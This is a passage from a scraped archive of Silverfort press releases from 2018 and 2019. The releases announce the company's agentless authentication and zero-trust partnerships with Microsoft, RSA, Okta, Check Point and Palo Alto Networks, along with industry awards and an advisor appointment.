trademarks of their respective owners. Media Contact: Dan Chmielewski Madison Alexander PR 714-832-8716 949-231-2965 --- - Published: 2019-10-22 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-joins-the-microsoft-intelligent-security-association/ After Announcing a Co-Sell Partnership, the Companies Strengthen Their Relationship to Drive Secure Authentication in the Perimeter-less Cloud Era. October 22, 2019 06:00 AM Eastern Daylight Time BOSTON & TEL AVIV, Israel--(BUSINESS WIRE)-Silverfort, the provider of agentless authentication and Zero-Trust security solutions, announced today that it has joined the Microsoft Intelligent Security Association, a collaborative ecosystem of independent software vendors that have integrated their security solutions to provide better security for our mutual customers. Silverfort collaborates with Microsoft and other Association members to create a unified AI-driven authentication platform. Thanks to patent-pending technology and integrations with Microsoft’s identity products, including Azure Active Directory, Silverfort seamlessly delivers secure authentication and ‘Zero Trust’ security policies across all sensitive corporate assets, both on-premises and in the cloud, without the need to install any agents or proxies. This allows enterprises to protect critical assets that don’t support secure authentication today, and to migrate legacy servers and applications to the cloud (‘Lift-and-Shift’) without worrying about unauthorized access. “We are proud to strengthen our partnership with Microsoft and to join this important initiative,” said Hed Kovetz, CEO and Co-Founder at Silverfort. “Together with Microsoft we solve one of the top barriers for cloud migration, by seamlessly enabling secure authentication and access for any digital asset, including legacy and homegrown systems that enterprises are looking to migrate to the cloud without compromising on security. ” “We are delighted to welcome Silverfort to the Microsoft Intelligent Security Association,” says Ryan McGee, director of security product marketing, Microsoft. “The cloud era has changed how we have to think about security, where identity is the new control plane. This creates a growing need for delivering secure authentication across dynamic hybrid environments and helping organizations migrate their assets securely to the cloud. We are pleased that Silverfort integrates with Microsoft’s identity products to support this goal. ” Silverfort is also a member of Microsoft’s co-sell program and works with Microsoft’s sales teams to deliver next-generation authentication to Microsoft customers and partners around the world, protect authentication to sensitive assets they could not protect until today and enable secure migration of proprietary systems to Azure. To learn more about Silverfort’s Agentless Authentication Platform and how it enables Risk-Based Zero-Trust policies – visit www. Silverfort. com About Silverfort Silverfort delivers secure authentication and Zero Trust across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments. The company has been named a Gartner ‘Cool Vendor’ and received worldwide recognition, including the Most Innovative Adaptive Authentication InfoSec Award 2019, InfoSecurity 2018 Global Excellence Awards for Best Authentication Product, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more. Media Contact: Dan Chmielewski Madison Alexander PR 714-832-8716 949-231-2965 dchm@madisonalexanderpr. com --- - Published: 2019-09-26 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-recognized-by-451-research-as-a-451-firestarter/ Provider of agentless, proxyless authentication platform recognized by leading analyst firm for innovation and vision in the technology industry BOSTON, MA and Tel Aviv, Israel Sept. 26, 2019 — Silverfort, the provider of Next-Generation Authentication solutions, today announced it has received a 451 Firestarter award from leading technology research and advisory firm 451 Research, recognizing the company’s innovative contribution within the technology industry. 451 Research’s Firestarter program recognizes exceptional innovation within the information technology industry. Introduced in 2018, and awarded quarterly, the program is exclusively analyst-led, allowing its team of technology and market experts to highlight organizations they believe are significantly contributing to the overall pace and extent of innovation in the technology market. “We are honored to be recognized as a ‘451 Firestarter’ and to receive this recognition for our technology and vision,” says Hed Kovetz, Silverfort Co-Founder and CEO. “This award validates our mission to enable seamless secure authentication and Zero Trust in today’s perimeterless enterprise networks and cloud environments, allowing enterprises to secure any sensitive system or resource with a holistic approach that does not require any software agents or proxies. ” “With the growth of cloud services and applications, IoT devices, and mobility, everything is connected to everything, which implies that authentication needs to take place nearly everywhere” said Garrett Bekker, 451 Research. “Silverfort’s no-agent, no-proxy approach to risk-based authentication can be applied to a broad range of assets and computing frameworks (public cloud, on-prem, SaaS, hybrid), and in that sense seems to lend itself particularly well to a zero-trust strategy. ” Download A Free Copy of The 451 Research 2019 FireStarter Report About Silverfort Silverfort delivers secure authentication and Zero Trust across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments. The company has been named a Gartner ‘Cool Vendor’ and received worldwide recognition, including the Most Innovative Adaptive Authentication InfoSec Award 2019, InfoSecurity 2018 Global Excellence Awards for Best Authentication Product, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more About 451 Research 451 Research is a leading information technology research and advisory company focusing on technology innovation and market disruption. More than 100 analysts and consultants provide essential insight to more than 2,000 client organizations globally through syndicated research, advisory services and live events. Founded in 2000 and headquartered in New York, 451 Research is a division of the 451 Group. Learn more about the 451 Research Firestarters. For media inquiries please contact: Dan Chmielewski Madison Alexander PR 714-832-8716 949-231-2965 --- - Published: 2019-09-04 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-joins-rsa-ready-technology-partner-program/ Silverfort’s Agentless Authentication Platform enables joint customers to seamlessly extend RSA SecurID® Access to any sensitive system and apply Zero-Trust security policies across corporate networks and cloud environments. September 04, 2019 06:00 AM Eastern Daylight Time BOSTON & TEL AVIV, Israel--(BUSINESS WIRE)-Silverfort, the provider of Next-Generation Authentication solutions, today announces interoperability between Silverfort’s agentless authentication platform and RSA SecurID Access (the RSA Multi-Factor Authentication solution). The interoperability will allow joint customers to extend secure authentication to any sensitive system in any environment, including systems that could not be protected until today - without requiring software agents, proxies or code changes. Customers will also be able to implement Zero-Trust access policies without rebuilding or changing their networks. Corporate networks have been going through dramatic changes in the past few years, due to IT revolutions such as the cloud, Internet of Things (IoT) and Bring Your Own Device (BYOD). In this new reality, with countless devices and services, all connected to each other without clear perimeters, it is critical to verify user identities before granting them access to sensitive resources, whether on-premises or in the cloud. Silverfort introduces a next-generation authentication platform which enables secure authentication for any sensitive system, including systems that were considered “unprotectable” until today, without requiring agents, proxies or code changes. This includes homegrown applications, IT infrastructure, IoT devices, dynamic IaaS environments, machine-to-machine access and more. Interoperability with RSA SecurID Access will leverage multi-factor authentication methods like mobile push notifications and biometrics to enable joint customers to extend the use of RSA SecurID Access to any sensitive system and address a wide variety of security use cases and regularity compliance needs. Customers will also be able to enforce holistic Zero-Trust access policies, not only at the gateway but also inside each environment, without modifying their network architecture. “The RSA Ready ecosystem and Silverfort together offer a powerful and unique solution that addresses fast growing security challenges in today’s enterprises,” said Hed Kovetz, CEO and Co-Founder of Silverfort. “We are proud to become part of the RSA Ready Program and thrilled to deliver together seamless, secure authentication and Zero Trust policies suitable for today’s hybrid perimeter-less networks. ” RSA, a global cybersecurity leader delivering Business-Driven Security™ solutions to help organizations manage digital risk, through the RSA Ready program provides technology partners an opportunity to develop, certify and market solutions with RSA. Together, Silverfort and the RSA Ready Partner Program will empower customers to focus on opportunities to transform their business while protecting their most valuable assets. The Silverfort Agentless Authentication Platform is generally available and customers are welcome to schedule a demo. About Silverfort Silverfort delivers secure authentication and Zero Trust across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables risk-based multi-factor authentication for all sensitive users, devices and resources, including systems that could not be protected until today, such as homegrown applications, IT infrastructure, file systems, machine-to-machine access and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks and cloud environments. The company has been named a Gartner ‘Cool Vendor’ and received worldwide recognition, including the Most Innovative Adaptive Authentication InfoSec Award 2019, InfoSecurity 2018 Global Excellence Awards for Best Authentication Product, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more. Media Contact: Dan Chmielewski Madison Alexander PR 714-832-8716 949-231-2965 dchm@madisonalexanderpr. com --- - Published: 2019-05-29 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-named-a-may-2019-gartner-cool-vendor-in-identity-and-access-management/ Vendors Included in 2019 Cool Vendor Report are Interesting, New and Innovative... Vendors Included in Cool Vendor Report are Interesting, New and Innovative BOSTON, MA and Tel Aviv, Israel May 23, 2019 — Silverfort, the provider of Next Generation Authentication solutions, today announced it has been included in the “Cool Vendors in Identity and Access Management for 2019” report by Gartner, Inc. According to the report, “Digital businesses must achieve a great user experience, and support digital transformation and optimization as well as the shift of workloads to the cloud. ” The report recommends that “o future-proof legacy IAM infrastructures to quickly deliver business value and support cyber defense, security and risk management leaders responsible for identity and access management should support a continuous adaptive risk and trust assessment posture by comprehensively mapping all authentication activity in an enterprise to support MFA for high-risk activity. ” Silverfort offers a unique next-generation authentication platform that can seamlessly enforce secure authentication for any user, device and asset, without requiring any software agents or proxies and without decrypting network traffic. This enables enterprises to address the new challenges introduced by the growing adaptation of cloud, IoT and BYOD, which are erasing traditional network perimeters. Silverfort’s agentless and proxyless architecture enables it to protect sensitive systems that were considered “unprotectable” until today, like homegrown applications, IT infrastructure, IoT devices, dynamic IaaS environments and more. Silverfort monitors 20x-50x more access requests than other adaptive authentication solutions, and leverages a sophisticated AI-driven risk engine to continuously analyze all access activity, including user-to-machine and machine-to-machine, across on-premises and cloud environments. “We feel that being named a Cool Vendor in Identity and Access Management by Gartner is tremendous validation of our mission to enable secure authentication and access in today’s perimeterless enterprise environments” said Hed Kovetz, Silverfort Co-Founder and CEO. “We are experiencing rapid growth as companies are rethinking their authentication strategies in this new era, as well as looking to address existing security and compliance gaps. ” To read more – see Silverfort’s blog: https://www. silverfort. com/blog/Silverfort-Named-Gartner-Cool-Vendor Gartner subscribers can access the report here: Cool Vendors in Identity and Access Management by Felix Gaehtgens, Mary Ruddy, David Mahdi, Paul Rabinovich, Michael Kelley, Ant Allan , May 10, 2019. Join us for a live webinar and demo on June 11th 1pm EST/10am PST - reserve your seat today: Required Disclaimer Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner’s research organization and should not be construed as statements of fact. Gartner disclaims all warranties, express or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose. About Silverfort Silverfort delivers strong authentication across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks, including hybrid and multi-cloud environments. Media Contact: Dan Chmielewski Madison Alexander PR 714-832-8716 949-231-2965 dchm@madisonalexanderpr. com --- - Published: 2019-03-26 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-and-okta-partner-to-enable-secure-authentication-for-unprotectable-systems/ The new partnership will allow joint customers to seamlessly extend Okta Adaptive... The new partnership will allow joint customers to seamlessly extend Okta Adaptive Multi-Factor Authentication to any sensitive system, and securely migrate sensitive servers and applications to the cloud. BOSTON, MA and Tel Aviv, Israel March 27, 2019 — Silverfort, the provider of Next-Generation Authentication solutions, today announces a new partnership with Okta, the leading independent provider of identity for the enterprise. By integrating Okta Multi-Factor Authentication (MFA) with Silverfort’s agentless authentication platform, joint customers will be able to extend secure authentication to any sensitive system in any environment, and securely migrate sensitive on-premises assets to the cloud, without requiring software agents or proxies. Seamlessly Extending MFA to Any Resource, Including ‘Unprotectable’ Systems Today, MFA and adaptive authentication are available only for specific types or resources, such as SaaS applications and VPN gateways. Silverfort introduces a next-generation risk based authentication platform which enables secure authentication for any system, including systems that were considered “unprotectable” until today, without any modifications to endpoints and servers. This includes homegrown applications, IT infrastructure, IoT devices, dynamic IaaS environments and more. By integrating with Okta, joint customers will be able to seamlessly extend Okta MFA to any sensitive system and address a wide variety of security use cases and regularity compliance needs, without having to enroll users with a new MFA product. “Okta and Silverfort bring together a powerful and unique solution that addresses one of the fastest growing security challenges in today’s enterprises,” says Hed Kovetz, CEO and Co-Founder of Silverfort. “Cloud, IoT and personal devices are changing our enterprise networks and erasing their perimeters. In this new reality, users must be authenticated before allowing them to access any sensitive resource, whether within the corporate network or in the cloud. We are proud to partner with Okta and excited to introduce the first end-to-end authentication solution that covers all users, devices and systems. ” Enable Secure Cloud Migration of Sensitive Servers and Applications By enabling secure authentication for sensitive assets that cannot be protected today, such as homegrown, legacy and proprietary systems, Silverfort and Okta allow organizations to migrate them to the cloud without worrying about unauthorized access. Today, many companies are reluctant to move their sensitive workloads to the cloud unless they can ensure that no one else can access them. By seamlessly enabling MFA and adaptive authentication for any system, including those that don’t support it today, Silverfort and Okta eliminate this barrier. “Enterprises are managing an increasingly broad spectrum of endpoints, with access management serving as one of the most effective ways to connect users with the technology they need while simultaneously securing an organization’s most valuable resources,” said Chuck Fontana, Vice President of Integrations and Strategic Partnerships at Okta. “As the technology landscape continues to evolve, it will be imperative for organizations to continue to adapt their multi-factor authentication capabilities, and we’re excited to work with Silverfort to meet that important security and user experience need. ” Silverfort will be demonstrating the joint solution at Oktane 2019, April 1-4, Moscone West, San Francisco Schedule a demo About Silverfort Silverfort delivers strong authentication across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks, including hybrid and multi-cloud environments. Media Contact: Dan Chmielewski Madison Alexander PR 714-832-8716 949-231-2965 dchm@madisonalexanderpr. com --- - Published: 2019-03-03 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-named-winner-of-most-innovative-adaptive-authentication-infosec-award-for-2019-by-cyber-defense-magazine/ Silverfort Named Winner of Most Innovative... A Demo of Silverfort’s Next-Generation Authentication Platform Will Be Shown This Week During the RSA Conference 2019 at South Hall Booth #1641 South BOSTON, MA and Tel Aviv, Israel March 5, 2019 — Silverfort, , the provider of next-generation authentication solutions, today announced that the Silverfort Next-Generation Authentication Platform received the Most Innovative Adaptive Risk-Based Authentication InfoSec Award for 2019 by Cyber Defense Magazine. Corporate networks have been going through dramatic changes in the past few years, due to IT revolutions such as the cloud, Internet of Things (IoT), Bring Your Own Device (BYOD) that are creating new cybersecurity challenges. With countless devices and services, on-premises and in the cloud, and the dissolving network perimeters, traditional authentication solutions become irrelevant, and a new approach is needed. Silverfort seamlessly delivers secure authentication across all those systems and environments without requiring any agents or proxies. Thanks to its agentless architecture, it then continuously analyzes the behavior of all users and devices with an AI-driven risk engine, triggering step-up authentication and blocking threats in real-time without disrupting legitimate users. “Silverfort has won the Most Innovative Adaptive Risk-Based Authentication InfoSec Award from our magazine because they are an innovator that might actually help you reach this goal and defeat the next generation of identity-based attacks,” said Gary S. Miliefsky, CEO, Cyber Defense Media Group, which is in its 7th year of publishing Cyber Defense Magazine and running these independent and prestigious awards. “We are honored to be recognized by Cyber Defense Magazine for our achievements in building the next-generation of secure authentication solutions, that enable organizations to seamlessly protect any sensitive system, across distributed environments, and prevent unauthorized access as well as identity-based attacks in real-time,” said Hed Kovetz, CEO and Co-founder of Silverfort. “Silverfort is committed to solving the challenges our customers are facing by continuing to offer innovative, user friendly solutions. ” See a demo of @Silverfort Next-Generation Authentication platform at booth #1641 in the South Hall at the #RSAC in San Francisco this week. About Silverfort Silverfort delivers strong authentication across entire corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments. The company has received worldwide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more. About CDM InfoSec Awards This is Cyber Defense Magazine’s seventh year of honoring InfoSec innovators. Our submission requirements are for any startup, early stage, later stage or public companies in the INFORMATION SECURITY (INFOSEC) space who believe they have a unique and compelling value proposition for their product or service. Learn more at www. cyberdefenseawards. com About the Judging The judges are CISSP, FMDHS, CEH, certified security professionals who voted based on their independent review of the company submitted materials on the website of each submission including but not limited to data sheets, white papers, product literature and other market variables. CDM has a flexible philosophy to find more innovative players with new and unique technologies, than the one with the most customers or money in the bank. CDM is always asking “What’s Next? ” so we are looking for Next Generation InfoSec Solutions. About Cyber Defense Magazine With over 1. 4 Million annual readers and growing, and over 7,000 pages of searchable online infosec content, Cyber Defense Magazine is the premier source of IT Security information. We are managed and published by and for ethical, honest, passionate information security professionals. Our mission is to share cutting-edge knowledge, real-world stories and awards on the best ideas, products and services in the information technology industry. We deliver electronic magazines every month online for free, and limited print editions exclusively for the RSA conferences and our paid subscribers. CDM is a proud member of the Cyber Defense Media Group. Learn more about us at http://www. cyberdefensemagazine. com and visit http://www. cyberdefensetv. com and http://www. cyberdefenseradio. com to see and hear some of the most informative interviews of many of these winning company executives. Media Contact: Dan Chmielewski Madison Alexander PR 714-832-8716 949-231-2965 dchm@madisonalexanderpr. com --- - Published: 2019-02-20 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-achieves-microsoft-co-sell-status/ Co-sell partnership to provide unparalleled access to Microsoft’s Enterprise customers. Co-sell partnership to provide unparalleled access to Microsoft’s Enterprise customers. Silverfort offers the first next-generation authentication platform, enabling enterprises to migrate sensitive assets securely to the cloud. BOSTON, MA and Tel Aviv, Israel Feb 20, 2019 — Silverfort, joins a specialised group of high-growth startups, earning co-sell status as part of Microsoft’s new programme to collaborate on intensive joint sales and go-to-market initiatives. The company will partner with Microsoft sales teams to enable enterprises to deliver adaptive authentication to any sensitive system, including homegrown applications and IoT, without requiring any agents or proxies and without any integration with individual systems. This allows enterprises to securely migrate their systems to the Azure cloud infrastructure, including homegrown and proprietary systems that were left on-premise because they couldn’t be protected from unauthorized access with secure authentication. Hed Kovetz, CEO of Silverfort said “We’re thrilled that we have achieved co-sell status. Landing the co-sell partnership with Microsoft allows Silverfort to deliver next-generation authentication to Microsoft customers and partners around the world, protect authentication to sensitive assets they could not protect until today and enable secure migration of proprietary systems to Azure. ” Silverfort’s ground-breaking platform uses an AI-Driven risk engine to continuously analyze risk and trust levels, enabling customers to enforce accurate and holistic adaptive authentication policies. It helps organizations secure access to any sensitive system both on-premise and in the cloud, prevent data breaches and comply with data security regulations like PCI-DSS, GDPR, HIPAA, NY-DFS and others. Charlotte Yarkoni, Microsoft’s Corporate VP, Growth and Ecosystems commented at the February 2018 launch of Microsoft for Startups, “We are committing $500 million over the next two years to offer joint sales engagements with startups, along with access to our technology... Microsoft is partnering with founders and investors to help propel their growth. ” Warwick Hill, Senior MD Microsoft for Startups Europe & Middle East added: “Over the last few years, corporate networks have gone through dramatic changes due to IT revolutions such as cloud, IoT and BYOD. This calls for a new approach to authentication, that will protect those countless assets from unauthorized access. We are excited to join hands with Silverfort to bring its agentless authentication platform to Microsoft’s enterprise customers. ” About Silverfort Silverfort delivers strong authentication across corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks across complex, dynamic networks, including hybrid and multi-cloud environments. Media Contact: Dan Chmielewski Madison Alexander PR 714-832-8716 949-231-2965 dchm@madisonalexanderpr. com --- - Published: 2019-02-06 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/industry-veteran-alan-cohen-joins-silverfort-as-strategic-advisor/ Cohen to advise on the company’s vision and scaling operations to meet growing demand for its agentless... Cohen to advise on the company’s vision and scaling operations to meet growing demand for its agentless authentication platform BOSTON, MA and Tel Aviv, Israel Feb 6, 2019 — Silverfort, the provider of next-generation authentication solutions, today announced that Alan Cohen has joined as a strategic advisor. A former senior executive at leading technology companies such as Illumio, Nicira and Cisco, Cohen has had a successful 25-year career at cloud software, networking and security companies as a hands-on executive and board member, generating revenue of more than $6 billion. He is a frequent industry speaker and commentator whose work appears regularly in The New York Times, Forbes, Fortune, Recode, ReadWrite, and Pando Daily. Silverfort’s non-intrusive MFA platform enables organizations to secure access to any sensitive resource, including systems that couldn’t be protected until today, without requiring agents, proxies or local configurations. Using innovative technology, Silverfort can help enterprises transition into modern IAM frameworks including adoption of AI-based adaptive authentication, zero-trust security and passwordless authentication, without having to change their existing systems and networks – which is often a significant barrier. “Silverfort’s groundbreaking technology solves a big security gap for many organizations - a gap that is only growing bigger as network perimeters continue to dissolve,” says Cohen. “I’m excited to join this talented team and help them bring this solution to the market. ” “Alan's successful track record, vast experience and industry influence are a tremendous addition to our team,” says Hed Kovetz, CEO of Silverfort. “We are truly lucky to have access to Alan’s experience and mentorship as we continue to expand our market presence through strategic partnerships and accelerate the company’s growth. ” “Protecting the Unprotectable” with Next-Generation Authentication As network perimeters continue to disappear due to cloud migration, IoT, Bring-Your-Own-Device policies and more, current MFA solutions are becoming ineffective and cannot handle the diversity, complexity and dynamic nature of the new corporate environment. Silverfort enables companies to seamlessly deliver strong authentication across all sensitive assets both on-premises and in the cloud, without requiring any agents or proxies, and to leverage AI-driven adaptive authentication policies across all systems and environments. Silverfort’s agentless architecture and holistic approach offer a big advantage over mainstream MFA solutions as they enable organizations to extend protection to any sensitive system or resource, including systems that were considered “unprotectable” until today, such as homegrown and proprietary business applications, regulated systems and data (e. g. financial, healthcare), IT infrastructure (e. g. hypervisors, DCs and network equipment), administrative access (e. g. PAM, RDP, SSH), file shares, databases, SCADA, IoT devices and more. By enabling strong authentication to proprietary systems and applications, Silverfort also helps companies migrate them securely and easily to the cloud. Silverfort monitors all access requests across on-premises and cloud environments, continuously calculating risk levels and applying adaptive authentication policies to step up authentication and block threats in real time. This allows organizations to maximize security while minimizing disruptions to legitimate users. About Silverfort Silverfort delivers strong authentication across entire corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments. The company has received worldwide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi-Factor Authentication category. Contact us to learn more. Media Contact: Dan Chmielewski Madison Alexander PR 714-832-8716 949-231-2965 dchm@madisonalexanderpr. com --- - Published: 2018-11-27 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-launches-first-holistic-ai-driven-adaptive-authentication/ The agentless solution analyzes user... The agentless solution analyzes user behavior across all corporate devices, resources and environments, to enable risk-based authentication policies with unparalleled coverage and accuracy. BOSTON, Oct 23, 2018 — Silverfort, the provider of next-generation multi-factor authentication solutions, today announced a first-of-its-kind AI-based risk engine that analyzes activities across all on-premises and cloud environments, to dynamically calculate the most accurate risk-score per user, device and resource, and apply effective authentication policies. Most Multi-Factor Authentication (MFA) solutions were designed as point solutions for specific systems or for certain types of assets (e. g. web applications). As such, the risk analysis and adaptive authentication policies they can offer are limited to the specific systems they protect. They are incapable of protecting the wide variety of endpoints, applications, servers, legacy systems, infrastructure, data, cloud resources and IoT devices that exist in today’s organizations. A Holistic Approach Provides Accurate Risk Analysis Unlike these point solutions, Silverfort’s approach is fundamentally different. Silverfort looks at authentication at the network level instead of integrating MFA into each individual asset. This holistic approach enables unified authentication policies, visibility, user experience and risk analysis across all systems and environments. Silverfort’s agentless architecture and holistic approach offer a big advantage over other solutions as they enable unparalleled visibility into all user activities, across all systems and environments, continuously analyzing risk for every authentication request with unmatched accuracy. “Monitoring all authentication activities in one centralized platform allows Silverfort to analyze more data than any other authentication solution — typically hundreds of authentication requests per user per day. ” explains Hed Kovetz, CEO and Co-Founder of Silverfort. “This provides a far more accurate risk score and enables adaptive policies that are less disruptive yet more effective. ” Continuously Assessing Risk with Silverfort’s AI-Based Risk Engine Silverfort’s risk engine combines 3 core components that continuously analyze risk based authentication activities in real-time to detect a wide range of malicious behaviors and threats. To Learn more about Silverfort’s Adaptive Authentication download the White Paper Silverfort’s Risk Engine combines the following core components: Anomaly Detection: Identifies deviations from normal activities based on a rich behavioral profile of each user and device. Recognition of Known Malicious Patterns: Automatically recognizes patterns of brute force attacks, lateral movement, ransomware and more. Threat indications from 3rd party security solutions: Instantly steps up the authentication requirements in response to threat alerts from third party solutions. The combination of these components results in the most accurate risk score and enables adaptive policies that are less disruptive yet more effective. Meet Silverfort at Gartner Identity and Access Management Summit 2018 Visit Silverfort and watch a demo of the Next-Gen Authentication Platform at booth #611 at the Expo Hall, Monday, Dec 3rd through Wednesday, Dec 5th To schedule a meeting please click here. About Silverfort Silverfort delivers strong authentication across entire corporate networks and cloud environments, without deploying any software agents or inline proxies. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments. The company has received worldwide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi Factor Authentication category. Contact us to learn more - silverfortcnt. wpengine. com/contact Media Contact: Dan Chmielewski Madison Alexander PR 714-832-8716 949-231-2965 dchm@madisonalexanderpr. com --- - Published: 2018-11-13 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-partners-with-check-point-to-deliver-threat-driven-mfa/ The joint solution enables real-time step-up authentication response to detected threats... The joint solution enables real-time step-up authentication response to detected threats BOSTON, Oct 23, 2018 — Silverfort, the provider of next-generation multi-factor authentication solutions, today announced that it has partnered with Check Point Software Technologies Ltd. to enable customers to respond to detected threats in real-time by stepping-up authentication. The joint solution enables unparalleled risk-based adaptive authentication throughout the organization. One of the top challenges for security teams trying to respond to detected threats is the amount of false positive alerts. With this integration, customers can leverage Silverfort’s adaptive authentication platform to trigger step-up authentication in response to any Check Point detected threats in real-time and eliminate false positives. For example, if Check Point detects bot activity from a specific host, Silverfort can automatically require an additional form of authentication for any attempt to access resources performed by the suspect host. If the additional authentication fails, the activity will be blocked. “The threat landscape is evolving faster than ever before, requiring security practitioners to swiftly and concisely respond to detected threats,” says Snir Hassidim, Business and Corporate Development Manager at Check Point Software Technologies. “This partnership with Silverfort will improve our customers’ ability to respond to these threats, by stepping up the authentication requirements to seamlessly improve validation of user identities. ” Download the joint solution brief Enabling Real-Time Incident Response with Dynamic Policies Network security solutions provide a binary approach to threat prevention: when detecting a threat, they either block the user, or allow access and raise an alert. By combining the two solutions, our customers can leverage dynamic step-up authentication as a response to network security events. When Check Point identifies a compromised user or device, it sends an alert to Silverfort which responds by dynamically stepping up the authentication requirements, demanding the user to use an additional form of authentication and confirm his/her identity. Dynamically stepping up the authentication criteria instead of simply rejecting the transaction, improves real-time incident response allowing organizations to respond with effective security measures upon suspicious activity. It is also less disruptive than automatic blocking of user access, because it enables the user to quickly confirm his/her identity and continue without unnecessary disruptions to the business. Improving Detection of Malicious Activity with High Fidelity-Alerts Today, security professionals need to deal with a high volume of security alerts. Detecting internal malicious activity,like lateral movement, becomes very difficult because a skilled attacker knows how to blend in with normal user activity. Distinguishing between false positives and real malicious incidents is nearly impossible. “Corporate networks have dramatically changed in recent years creating new security challenges. Perimeters no longer exist, and passwords are no longer enough to validate and trust our users. ” says Hed Kovetz, CEO of Silverfort. “By integrating Silverfort’s adaptive authentication with Check Point we enable our customers to trigger step-up authentication based on real-time security alerts, and achieve real-time prevention without reducing the productivity of their legitimate users. ” About Silverfort Silverfort delivers strong authentication across entire corporate networks and cloud environments, without any modifications to endpoints and servers. Using patent-pending technology, Silverfort enables adaptive multi-factor authentication for all sensitive users, devices and resources, including systems that don’t support it today, such as IoT devices, critical infrastructure, file systems and more. Silverfort allows organizations to prevent data breaches and achieve compliance instantly, by preventing identity-based attacks even across complex, dynamic networks, including hybrid and multi-cloud environments. The company has received worldwide recognition and several industry awards, including the InfoSecurity 2018 Global Excellence Awards for Best Authentication Product and Best User and Entity Behavior Analytics Product, the Frost & Sullivan 2017 New Product Innovation Award, and is a gold winner of the Cybersecurity Excellence Awards in the Multi Factor Authentication category. Contact us to learn more - silverfort. com/contact Media Contact: Dan Chmielewski Madison Alexander PR 714-832-8716 949-231-2965 dchm@madisonalexanderpr. com --- - Published: 2018-10-08 - Modified: 2024-06-05 - URL: https://www.silverfort.com/press-news/silverfort-next-gen-authentication-app-now-available-on-the-palo-alto-networks-application-framework/ Next Generation Authentication Leader Onboards Executives to Scale Operations and Meet... Boston, MA and Tel Aviv, Israel , October 8th 2018 — Silverfort today announced the availability of the Silverfort Next Generation Authentication App for the Palo Alto Networks® Application Framework. The Application Framework is a cloud-based framework that extends the capabilities of the Palo Alto Networks Security Operating Platform, allowing organizations to rapidly consume and implement a variety of innovative security apps from any provider, large or small. Silverfort enables organizations to add risk-based adaptive authentication to any system or resource, across entire networks and cloud environments, without deploying any software agents, costly integrations or reducing 